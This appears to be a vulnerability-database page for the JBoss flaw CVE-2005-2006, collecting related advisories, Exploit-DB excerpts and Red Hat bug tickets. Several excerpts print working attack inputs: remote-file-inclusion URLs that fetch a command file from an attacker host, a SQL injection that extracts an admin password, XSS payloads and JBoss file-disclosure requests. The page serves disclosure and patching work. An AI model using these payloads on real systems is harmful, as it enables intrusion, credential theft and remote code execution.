CVE-2005-2006
Published 2005-06-17
Priority P4 · 23 · medium · 5 · CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS 9.23% · 94.7th percentile
JBOSS 3.2.2 through 3.2.7 and 4.0.2 allows remote attackers to obtain sensitive information via a GET request (1) with a "%." (percent dot), which reveals the installation path or (2) with a % (percent) before a filename, which reveals the contents of the file.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | systems_insight_manager | — | — |
| hp | systems_insight_manager | — | — |
| jboss | jboss | — | — |
| jboss | jboss | — | — |
| jboss | jboss | — | — |
| jboss | jboss | — | — |
| jboss | jboss | — | — |
| jboss | jboss | — | — |
| jboss | jboss | — | — |
CVSS provenance
nvd · v2.0 · 5.0 · MEDIUM · AV:N/AC:L/Au:N/C:P/I:N/A:N
ghsa · 5.0 · MEDIUM
GHSA
GHSA-4w4w-p43q-qpr8: Directory traversal vulnerability in HP Systems Insight Manager 4
ghsa_unreviewed·2022-05-01·CVSS 5.0
CVE-2006-0656 [MEDIUM] GHSA-4w4w-p43q-qpr8: Directory traversal vulnerability in HP Systems Insight Manager 4
Directory traversal vulnerability in HP Systems Insight Manager 4.2 through 5.0 SP3 for Windows allows remote attackers to access arbitrary files via unspecified vectors, a different vulnerability than CVE-2005-2006.
GHSA
GHSA-6ch7-6xxg-vw5p: JBOSS 3
ghsa_unreviewed·2022-05-01
CVE-2005-2006 [MEDIUM] GHSA-6ch7-6xxg-vw5p: JBOSS 3
JBOSS 3.2.2 through 3.2.7 and 4.0.2 allows remote attackers to obtain sensitive information via a GET request (1) with a "%." (percent dot), which reveals the installation path or (2) with a % (percent) before a filename, which reveals the contents of the file.
GHSA
Mortbay Jetty Discloses JSP Source Code
ghsa·2022-05-01·CVSS 5.0
CVE-2005-3747 [MEDIUM] CWE-200 Mortbay Jetty Discloses JSP Source Code
Unspecified vulnerability in Jetty before 5.1.6 allows remote attackers to obtain source code of JSP pages, possibly involving requests for .jsp files with URL-encoded backslash (`%5C`) characters. NOTE: this might be the same issue as CVE-2006-2758.
No detection rules found.
Exploit-DB
phpDirectorySource 1.0 - Cross-Site Scripting / SQL Injection
exploitdb·2009-07-21
CVE-2009-4681 phpDirectorySource 1.0 - Cross-Site Scripting / SQL Injection
---
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
[»] Web Business Directory 1.0 (search.php) Multiple Remote Vulnerabilities
[»] Script: [ Web Business Directory 1.0 ]
[»] Language: [ PHP ]
[»] Download: [ http://www.phpdirectorysource.com/ ]
[»] Founder: [ Moudi ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[»] Team: [ EvilWay ]
[»] Dork: [ Copyright 2005-2006 phpDirectorySource™, all rights reserved ]
[»] Price: [ $75.00 ]
[»] Site : [ https://security-shell.ws/forum.php ]
###########################################################################
===[ Exploit SQL INJECTION + LIVE : vulnerability ]===
[»] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st=
[»
Exploit-DB
Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Overflow / Local Privilege Escalation
exploitdb·2006-10-29
CVE-2006-4926 Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Overflow / Local Privilege Escalation
---
////////////////////////////////////
///// AVP (Kaspersky)
////////////////////////////////////
//// FOR EDUCATIONAL PURPOSES ONLY
//// Kernel Privilege Escalation #2
//// Exploit
//// Rubén Santamarta
//// www.reversemode.com
//// 01/09/2006
////
////
////Modify by Nanika
////naninb[at]gmail.com
////nanika[at]chroot.org
////Exploit Get SYSTEM SHELL PORT 8080
////WindowsXP Version SP2+ Kaspersky Internet Security 6.0.0.303
////Do not Enable Hardware DEP
////Reference:
////http://hitcon.org/download/2005/Windows_Kernel_Shellcode_Exploit.pdf
////http://research.eeye.com/html/Papers/download/StepIntoTheRing.pdf
////http://www.security.org.sg/code/sdtrestore.html
////http://www.reversemode.com
Exploit-DB
Nvidia Graphics Driver 8774 - Local Buffer Overflow
exploitdb·2006-10-16
CVE-2006-5379 Nvidia Graphics Driver 8774 - Local Buffer Overflow
---
/*
* Copyright (c) 2005 Matthieu Herrb
* Copyright (c) 2006 Derek Abdine, Marc Bevand
*
* Permission to use, copy, modify, and distribute this software for any
* purpose with or without fee is hereby granted, provided that the above
* copyright notice and this permission notice appear in all copies.
*
* THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
* WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
* ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
* WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
* ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
* OR
Exploit-DB
Randshop 1.1.1 - 'header.inc.php' Remote File Inclusion
exploitdb·2006-07-01
CVE-2006-3375 Randshop 1.1.1 - 'header.inc.php' Remote File Inclusion
---
Title : randshop <= 1.1.1 Remote File Inclusion Vulnerability
-
URL : http://www.randshop.com/
-
Author : OLiBekaS
-
contact : olibekas[at]gmail.com
-
dork : "software 2004-2005 by randshop"
-
exploit : http://[target]/[path]/includes/header.inc.php?dateiPfad=http://[attacker]/cmd.txt?&cmd=ls
-
greatz : Renzokuzen, skulmatic, sikunYuk, ulga, bigmaster, cgibin, weleh, and all #papmahackerlink crew
-
# milw0rm.com [2006-07-01]
Exploit-DB
Microsoft SMB Driver - Local Denial of Service
exploitdb·2006-06-13
CVE-2006-2374 Microsoft SMB Driver - Local Denial of Service
---
// source: https://www.securityfocus.com/bid/18357/info
The Microsoft SMB driver is prone to a local denial-of-service vulnerability.
A local attacker can exploit this issue to create processes that cannot be killed in affected operating systems, potentially denying service to legitimate users and other software on affected computers. This may aid the attacker in further attacks.
////////////////////////////////////////////////////////////////////////////////
///////// MRXSMB.SYS NtClose DEADLOCK exploit///////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
//November 19,2005
////////////////////////////////////////////////////////////////////////////////
//////////////////
Exploit-DB
Cisco - WebSense Content Filtering Bypass
exploitdb·2006-05-08
CVE-2006-0515 Cisco - WebSense Content Filtering Bypass
---
source: https://www.securityfocus.com/bid/17883/info
Multiple Cisco products are susceptible to a content-filtering bypass vulnerability. This issue is due to a failure of the software to properly recognize HTTP request traffic.
This issue allows users to bypass content-filtering and access forbidden websites.
Cisco is tracking this issue as Bug IDs CSCsc67612, CSCsc68472, and CSCsd81734.
http://www.cisco.com/pcgi-bin/Support/Bugtool/onebug.pl?bugid=CSCsd81734
// Copyright (C) 2005-2006 Virtual Security Research, LLC. - All rights reserved
// Disclaimer: Use this tool at your own risk. The author of this utility
// nor Virtual Security Research, LLC. will assume any liability for damage
// caused by running this code. This utility is prov
Exploit-DB
BK Forum 4.0 - 'member.asp' SQL Injection
exploitdb·2006-04-24
CVE-2005-1287 BK Forum 4.0 - 'member.asp' SQL Injection
---
# BK Forum
# Exploit:
First you must be logged in
Then type this in your browser
http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1
You will find admin's password
# Shoutz:
nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00
# Have phun!
# milw0rm.com [2006-04-24]
Exploit-DB
Clansys 1.1 - 'index.php' PHP Code Insertion
exploitdb·2006-04-23
CVE-2006-2005 Clansys 1.1 - 'index.php' PHP Code Insertion
---
NukedX Security Advisory Nr 2006-29
ClanSys v1.1 (index.php page) PHP Code Insertion Vulnerability
Method found & Exploit scripted by nukedx
Contacts > ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com
Original advisory: http://www.nukedx.com/?viewdoc=29
Dork: "ClanSys v.1.1" 2.400 pages.
Full PoC ->
GET -> http://[victim]/[ClanSysPath]/index.php?page=[PHPCode]
EXAMPLE -> http://[victim]/[ClanSysPath]/index.php?page=&s=http://yourhost.com/cmd.txt?
# nukedx.com [2006-04-23]
# milw0rm.com [2006-04-23]
Exploit-DB
Dragonfly CMS 9.0.6.1 Stories_Archive Module - Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2006-02-22
CVE-2006-1033 Dragonfly CMS 9.0.6.1 Stories_Archive Module - Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/16784/info
Dragonfly is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/index.php?name=Stories_Archive&sa=show_month&year=2005&month=11">alert()
http://www.example.com/index.php?name=Stories_Archive&sa=show_month&year=2005">alert()> &month=11
http://www.example.com/index.php?name=Stories_Archive&sa=show_all">alert(
Exploit-DB
F-Secure Internet GateKeeper for Linux < 2.15.484 / Gateway < 2.16 - Local Privilege Escalation
exploitdb·2005-11-07
CVE-2006-3546 F-Secure Internet GateKeeper for Linux < 2.15.484 / Gateway < 2.16 - Local Privilege Escalation
F-Secure Internet GateKeeper for Linux "
__lastedit__ = "Thu Sep 22 23:18:39 EDT 2005"
__usage__ = """usage: %s [-options]
options:
--version show program's version number and exit.
-h, --help show this help message and exit.
-s, --suid file location to suid.
-d, --dir cgi directory.
-c, --clean cleans any left over files from the environment creation.
-# enter numerical value of vulnerable file to exploit. [list below]
1: ifconfig_suid.cgi | 2: reboot_suid.cgi | 3: proxy_suid.cgi
4: edittmpl_suid.cgi | 5: version_suid.cgi | 6: hostname_suid.cgi
7: gateway_suid.cgi | 8: halt_suid.cgi | 9: edituserdb_suid.cgi
10: htpasswd_suid.cgi | 11: pattern_up_suid.cgi | 12: license_suid.cgi
13: iptables_suid.cgi | 14: dns_suid.cgi | 15: pattern_autoup_suid.cgi
16: spam_list_suid.cgi | 17: diag_suid.
Exploit-DB
JBoss 3.x/4.0.2 - HTTP Request Remote Information Disclosure
exploitdb·2005-06-17
CVE-2005-2006 JBoss 3.x/4.0.2 - HTTP Request Remote Information Disclosure
---
source: https://www.securityfocus.com/bid/13985/info
JBoss is prone to a remote information-disclosure vulnerability. The issue occurs in the 'org.jboss.web.WebServer' class and is due to a lack of sufficient sanitization of user-supplied request data.
Information that attackers can harvest through leveraging this issue may aid in further attacks against the affected service.
Example 1 (Installation path disclosure): [3.2.x and 4.0.2]
Request:
>>telnet [jbosshost] 8083
>>GET %. HTTP/1.0
Reply:
HTTP/1.0 400 C:\Programme\jboss-4.0.2\server\default\conf (Zugriff
verweigert)
Content-Type: text/html
Example 2 (Config file download): [4.0.2]
Request:
>>telnet [jbosshost] 8083
>>GET %server.policy HTTP/1.0
HackerOne
Linux kernel: CVE-2017-6074: DCCP double-free vulnerability
hackerone·2019-08-27·CVSS 7.8
CVE-2017-6074 [HIGH] Linux kernel: CVE-2017-6074: DCCP double-free vulnerability
Hi!
CVE-2017-6074 [1] is a double-free vulnerability I found in the Linux kernel. It can be exploited to gain kernel code execution from an unprivileged process. The kernel needs to be built with CONFIG_IP_DCCP for the vulnerability to be present. A lot of modern distributions enable this option by default.
Fixed on Feb 17, 2017 [2]. The oldest version that I checked is 2.6.18 (Sep 2006), which is vulnerable. However, the bug was introduced before that, probably in the first release with DCCP support (2.6.14, Oct 2005).
I initially reported this vulnerability to [email protected] following the coordinated disclosure process. The timeline and more details about the vulnerability can be found in my announcement on oss-securi
Bugzilla
CVE-2006-0082 security flaw
bugzilla·2018-08-16·CVSS 7.5
CVE-2006-0082 [HIGH] CVE-2006-0082 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Format string vulnerability in the SetImageInfo function in image.c for ImageMagick 6.2.3 and other versions, and GraphicsMagick, allows user-assisted attackers to cause a denial of service (crash) and possibly execute arbitrary code via a numeric format string specifier such as %d in the file name, a variant of CVE-2005-0397, and as demonstrated using the convert program.
Bugzilla
A number of tomcat issues
bugzilla·2007-05-09·CVSS 5.0
CVE-2005-3164 [MEDIUM] A number of tomcat issues
A number of issues affected tomcat 4.0.6 as distributed with Stronghold. Most
of these are minor severity, all need triaging:
http://tomcat.apache.org/security-4.html
Information disclosure CVE-2005-3164
Information disclosure CVE-2005-2090
Directory traversal CVE-2007-0450
Cross-site scripting CVE-2007-1358
Cross-site scripting CVE-2006-7196
Directory listing CVE-2006-3835
Cross-site scripting CVE-2005-4838
Denial of service CVE-2005-3510
Denial of service CVE-2003-0866
Information disclosure CVE-2002-2006
Discussion:
closing; Stronghold has reached end of life.
Bugzilla
CVE-2005-3352, CVE-2006-3918 apache security issues
bugzilla·2006-09-25·CVSS 4.3
CVE-2005-3352 [MEDIUM] CVE-2005-3352, CVE-2006-3918 apache security issues
Description of problem:
The following issues affect the stronghold-apache package:
CVE-2006-3918 Expect header XSS
CVE-2005-3352 cross-site scripting flaw in mod_imap
Version-Release number of selected component (if applicable):
stronghold-apache-1.3.22-25
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2006-0692.html
---
*** Bug 204049 has been marked as a duplicate of this bug. ***
Bugzilla
CVE-2006-0052 Mailman DoS, CVE-2006-1712 Mailman cross site scripting bug and CVE-2005-3573 Mailman Denial of Service (CVE-2005-4153); also CAN-2004-1177 Cross-site scripting (XSS) vulnerability
bugzilla·2006-06-02·CVSS 5.0
CVE-2006-0052 [MEDIUM] CVE-2006-0052 Mailman DoS, CVE-2006-1712 Mailman cross site scripting bug and CVE-2005-3573 Mailman Denial of Service (CVE-2005-4153); also CAN-2004-1177 Cross-site scripting (XSS) vulnerability
Mailman DoS allows remote attackers to cause a denial of service by using
multipart MIME message with a single part MIME message.
Mailman cross site scripting bug allows remote attackers to inject arbitrary web
script in the form of action argument.
In Mailman Denial of Service application crash and server message "fail with an
Overflow on bad date data in a processed message".
http://www.redhat.com/archives/fedora-test-list/2006-May/msg00131.html
http://www.redhat.com/archives/fedora-package-announce/2006-May/msg00134.htm
http://www.redhat.com/archives/fedora-package-announce/2006-May/msg00135.
Bugzilla
CVE-2005-4667 unzip long filename buffer overflow
bugzilla·2006-03-24·CVSS 3.7
CVE-2005-4667 [LOW] CVE-2005-4667 unzip long filename buffer overflow
+++ This bug was initially created as a clone of Bug #178960 +++
unzip long filename buffer overflow
unzip is vulnerable to a filename buffer overflow vulnerability. It
may be possible to execute arbitrary code as the user running unzip.
http://www.securityfocus.com/bid/15968/info
This issue can be verified with the following command:
unzip `perl -e 'print "A" x 50000'`
This issue also affects RHEL3
This issue also affects RHEL2.1
-- Additional comment from [email protected] on 2006-03-24 08:51 EST --
Exception approved at Mar 23 RHEL Updates meeting, added to RHEL4U4Proposed.
Please clone bug for RHEL3 and 2.1.
Discussion:
This flaw has been rated as having a low severity by the Red Hat
Security Response Team. More information
Bugzilla
CVE-2006-0746 kpdf buffer overflow
bugzilla·2006-03-07·CVSS 7.5
CVE-2006-0746 [HIGH] CVE-2006-0746 kpdf buffer overflow
+++ This bug was initially created as a clone of Bug #184307 +++
The initial fix for CVE-2005-3627 was incomplete in kdegraphics.
The complete patch is attachment 125771
The reproducer is attachment 125772
Here is Chris Evans' original advisory, it has links to various other bad pdf files:
http://scary.beasts.org/security/CESA-2005-003.txt
Discussion:
There's kde-3.5.1 in FC4-update. It's not affected in this new kde version
http://www.kde.org/info/security/advisory-20060202-1.txt
Bugzilla
CVE-2005-3656 mod_auth_pgsql format string issue
bugzilla·2006-01-09·CVSS 10.0
CVE-2005-3656 [CRITICAL] CVE-2005-3656 mod_auth_pgsql format string issue
Note that the Red Hat Security Response Team has rated this issue as having
critical security impact.
+++ This bug was initially created as a clone of Bug #177042 +++
iDEFENSE has reported a format string flaw in mod_auth_pgsql. This could allow
a remote unauthenticated attacker to execute arbitrary code as the httpd process.
-- Additional comment from [email protected] on 2006-01-05 13:12 EST --
This issue should also affect RHEL2.1 and RHEL3
-- Additional comment from [email protected] on 2006-01-05 13:34 EST --
RHEL2.1 uses version 0.9.9 of mod_auth_pgsql which uses a different
mechanism for logging of failures and is not affected by this vulnerability.
-- Additional comment from [email protected] on 2006-01-05 21:38 EST
Bugzilla
[PATCH] CVE-2006-0106: WINE vulnerable to CVE-2005-4560 WMF exploit
bugzilla·2006-01-08·CVSS 7.5
CVE-2006-0106 [HIGH] [PATCH] CVE-2006-0106: WINE vulnerable to CVE-2005-4560 WMF exploit
From Bugzilla Helper:
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.0 (like Gecko)
Description of problem:
Wine implements the full WMF API including SETABORTPROC, making it vulnerable
to the Windows WMF exploit (CVE-2005-4560).
This has been fixed in WINE CVS (revision 1.12 of wine/dlls/gdi/metafile.c).
URL: http://it.slashdot.org/comments.pl?sid=173205&cid=14412824 (or you can
get it directly from WINE CVS).
Version-Release number of selected component (if applicable):
wine-0.9.4-5.fc4
How reproducible:
Didn't try
Steps to Reproduce:
Try:
1. firing up a vulnerable Windows app in WINE and
2. opening an infected WMF file with it.
Actual Results: If what I've read is true, it is vulnerable.
E
Bugzilla
CVE-2005-3651 ethereal OSPF Protocol Dissector Buffer Overflow Vulnerability
bugzilla·2006-01-04·CVSS 7.5
CVE-2005-3651 [HIGH] CVE-2005-3651 ethereal OSPF Protocol Dissector Buffer Overflow Vulnerability
iDEFENSE discovered a buffer overflow vulnerability in Ethereal's OSPF protocol
dissector.
http://www.idefense.com/application/poi/display?id=349&type=vulnerabilities
This issue also affects RHEL2.1 and RHEL3
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2006-0156.html
Bugzilla
CVE-2006-0082 ImageMagick format string vulnerability.
bugzilla·2006-01-04·CVSS 7.5
CVE-2006-0082 [HIGH] CVE-2006-0082 ImageMagick format string vulnerability.
ImageMagick format string vulnerability.
The fix for CVE-2005-0397 is incomplete. As the Debian bug suggests,
by running a command such as:
convert file.jpg file%d%n.jpg
A segfault will result in ImageMagick.
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=345876
This issue also affects RHEL3
This issue also affects RHEL2.1
Discussion:
The fix in the debian bug is incomplete, the same code is repeated in blob.c
---
Created attachment 122767
patch for 6.2.5 (Rawhide)
---
Created attachment 122771
patch for 6.0.7 (RHEL 4)
---
Created attachment 122772
patch for 5.5.6 (RHEL 3)
---
Created attachment 122773
patch for 5.3.8 (RHEL 2.1)
---
The fixes are contained in
ImageMagick-6.0.7.1-14 (RHEL4)
ImageMagick-5.5.6-17 (RHE
Bugzilla
CVE-2005-3964 openmotif libUil buffer overflows
bugzilla·2005-12-02·CVSS 7.5
CVE-2005-3964 [HIGH] CVE-2005-3964 openmotif libUil buffer overflows
openmotif libUil buffer overflows
http://marc.theaimsgroup.com/?l=full-disclosure&m=113349242925897&w=2
xfocus have discovered two buffer overflow flaws in openmotif's libUil
library. This overflow is going to depend on how a motif application
is passing data into the UIL library.
This issue also affects FC3
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2006-0272.html
---
I can see where this issue has been
Bugzilla
CVE-2005-2973 ipv6 infinite loop
bugzilla·2005-10-14·CVSS 2.1
CVE-2005-2973 [LOW] CVE-2005-2973 ipv6 infinite loop
Patch successfully tested and posted for internal review on 27-Oct-2005.
Discussion:
A fix for this problem has just been committed to the RHEL3 U7
patch pool this evening (in kernel version 2.4.21-37.8.EL).
---
A fix for this problem has also been committed to the RHEL3 E7
patch pool this evening (in kernel version 2.4.21-37.0.1.EL).
---
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2006-0140.html
Bugzilla
CVE-2005-1704 Integer overflow in libelf
bugzilla·2005-06-08·CVSS 4.6
CVE-2005-1704 [MEDIUM] CVE-2005-1704 Integer overflow in libelf
Integer overflow in the BFD library for libelf before 6.3 allows attackers to
execute arbitrary code via a crafted object file that specifies a large number
of section headers, leading to a heap-based buffer overflow.
Discussion:
This issue should also affect RHEL2.1 and RHEL3
---
elfutils is not in RHEL2.1, my mistake.
---
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.
http://rhn.redhat.com/errata/RHSA-2006-0354.html
http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0424.html
http://marc.info/?l=bugtraq&m=111911095424496&w=2
http://secunia.com/advisories/15746
http://secunia.com/advisories/17559
http://secunia.com/advisories/18789
http://securityreason.com/securityalert/439
http://securitytracker.com/id?1015605
http://www.securityfocus.com/archive/1/440641/100/100/threaded
http://www.securityfocus.com/bid/13985
http://www.vupen.com/english/advisories/2005/0815
http://www.vupen.com/english/advisories/2006/0497
http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=c00597967